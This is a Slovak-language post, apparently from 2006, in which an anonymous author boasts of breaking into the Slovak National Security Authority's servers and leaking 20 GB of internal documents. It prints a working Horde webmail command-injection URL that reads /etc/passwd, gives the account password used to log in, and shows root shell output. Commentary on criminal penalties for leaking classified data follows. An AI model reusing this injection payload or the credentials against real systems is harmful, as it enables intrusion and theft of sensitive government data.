NÁRODNÝ BEZPEČNOSTNÝ ÚRAD
http://www.nbusr.sk/sk/index.html
Narodny Bezpecnostny Urad pwn3d
25 April, 2006 - 16:32 — Anonymous
Vdaka primitivnemu zabezpeceniu spominanej institucie doslo k analnej penetracii serverov NBU bez vedomia milanovho. z nbu uniklo 20 gigabajtov mailov, internych dokumentov, smernic, nariadeni a podobnych pic**** :)
vsetko sa zacalo pri vtipkoch medzi kamaratmi, ktori si vsimli chybu v mailovom rozhrani na adrese webmail.nbusr.sk, pomocou ktorej bolo mozne vykonavat systemove prikazy na serveri. (ja viem, tato veta znie uplne napicu, ale tak nech chapu aj ludia menej zasveteni danej problematike ;))
tym padom bolo mozne prevziat zoznam lokalnych userov na masine.
http://webmail.nbusr.sk/horde/services/help/
?show=about %22.passthru(%22cat%20%22.
chr(47).%22etc%22.chr(47).%22passwd%22);%27.
do oci bil najma uzivatel s loginom nbusr
nuz...
kruty vtip - pouzit heslo nbusr123 - nam takmer roztrhol branice - heslo fungovalo (na prvy pokus). ukazalo sa motd a boli sme prihlaseni na masine
po chvilke skumania a behania po stroji sme skusili su na roota utok na branice cislo 2 :)
%su
www.nbusr.sk# id
uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
www.nbusr.sk# uname -a
FreeBSD www.nbusr.sk 6.0-RELEASE FreeBSD 6.0-RELEASE #0:Thu Nov 3 UTC 2005 root@x64.samsco.home:/usr/obj/usr/src/sys/GE
http://blackhole.sk/node/442
a u nas su prisnejsie tresty
Vo vrcholne nepravdepodobnom pripade , ze sa dostali ku PT alebo T je ich bodove ohodnotenie velmi silne. V tom pripade by nebol problem nasit im § 319 TZ (Kto vyzvedá skutočnosť utajovanú na ochranu záujmov Slovenskej republiky alebo na ochranu záujmov iného štátu, medzinárodnej organizácie, nadnárodnej organizácie alebo združenia štátov, na ochranu záujmov ktorých sa Slovenská republika zaviazala, označenú podľa zákona stupňom utajenia Prísne tajné alebo Tajné, s cieľom vyzradiť ju nepovolanej osobe, alebo kto s takým cieľom zbiera údaje obsahujúce utajovanú skutočnosť, alebo kto takú utajovanú skutočnosť nepovolanej osobe úmyselne vyzradí, potrestá sa odňatím slobody na šesť mesiacov až tri roky).
Velmi spravne sa nasi freetajmisti obavali nieco zverejnit na nete, lebo to sa da kvalifikovat ako umyselne vyzradenie do cudziny co sa hodnoti 3 - 5 rokov natvrdo. Ak by sa vsak freetajmista zhodoval s platenym adminom, potom amen tma a 3 az 8 rokov v base.
http://blackhole.sk/node/444
Výskumník a vyučujúci predmetu Unix/Linux... na 101. najlepšej univerzite v oblasti informatika na svete shanghairanking.com/SubjectCS2012.html , . ACM Professional member #5480576